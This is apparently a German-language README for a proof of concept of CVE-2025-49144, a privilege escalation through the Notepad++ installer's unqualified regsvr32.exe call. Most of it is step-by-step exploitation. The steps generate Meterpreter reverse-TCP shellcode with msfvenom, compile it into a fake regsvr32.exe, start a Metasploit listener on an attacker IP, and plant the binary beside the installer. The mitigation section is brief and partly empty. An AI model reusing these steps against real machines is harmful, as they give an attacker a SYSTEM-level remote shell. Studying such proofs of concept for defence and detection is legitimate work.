
CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-Ebene POC
CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-level POC

📌 CVE-2025-49144 ist eine hochriskante lokale Privilegieneskalation-Schwachstelle, die in den Installationsprogrammen von Notepad++ v8.8.1 und früheren Versionen gefunden wurde. Diese Schwachstelle resultiert aus einem unkontrollierten Verhalten des ausführbaren Suchpfads während der Installation, was einem lokalen Angreifer ermöglicht, SYSTEM-Ebene-Privilegien zu erlangen, indem er schädliche ausführbare Dateien im selben Verzeichnis wie das Installationsprogramm platziert.
⚙️ Wie der CVE funktioniert – Schritt für Schritt:
🧱 1. Was ist im Installationsprogramm schiefgelaufen?
Das Notepad++-Installationsprogramm (vor v8.8.2) ruft regsvr32.exe auf, um einige Komponenten zu registrieren – tut dies jedoch ohne Angabe des vollständigen Pfads (wie C:\Windows\System32\regsvr32.exe).
Stattdessen führt es einfach aus:
regsvr32.exe some_dll
📂 2. Windows-Suchpfadverhalten: Wenn eine ausführbare Datei ohne vollständigen Pfad gestartet wird, verwendet Windows eine bestimmte Suchreihenfolge, um die Datei zu finden:
Wenn also eine gefälschte regsvr32.exe im selben Ordner wie das Installationsprogramm (z. B. Downloads) platziert wird, verwendet Windows diese vor der echten.
💣 3. Ausnutzung:
⚙️ Schritte zur Reproduktion:
Shellcode abrufen: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c > shellcode.txt
Laden Sie die Datei "regsvr32_loader.c" herunter und bearbeiten Sie sie. Fügen Sie den gesamten Shellcode aus shellcode.txt in den genannten Kommentar ein.
Kompilieren zu regsvr32.exe: x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
Einen Meterpreter-Listener bereitstellen: msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.9 set LPORT 4444 run
Laden Sie eine anfällige Version von Notepad++ herunter, d.h. vor 8.8.1, da 8.8.1 jetzt automatisch aktualisiert wird. Für den PoC habe ich Notepad++ v8.6.8 verwendet. Verschieben Sie die Datei "regsvr32.exe" in das Windows-System in denselben Ordner wie das Notepad++-Installationsprogramm, wahrscheinlich in den Downloads-Ordner. Schließen Sie die Installation des Notepad++-Installationsprogramms ab.
Hinweis: Dies ist ein PoC, daher getestet mit deaktiviertem Windows Defender und Echtzeitschutz.
✅ Minderung
Benutzer und Administratoren sollten:
Sicherheitsteams sollten regelmäßig Installationspfade prüfen, Schreibberechtigungen überwachen und das Verhalten während der Installationsausführung beobachten, um die Angriffsfläche zu verringern.
🏷️ Lizenz MIT-Lizenz — Nur für Bildungs-, Forschungs- und Verteidigungszwecke kostenlos.
🤝 Mitwirken Pull-Requests willkommen — Verbesserung der Erkennung, Hinzufügen von Funktionen oder Vorschlagen von Fehlerbehebungen.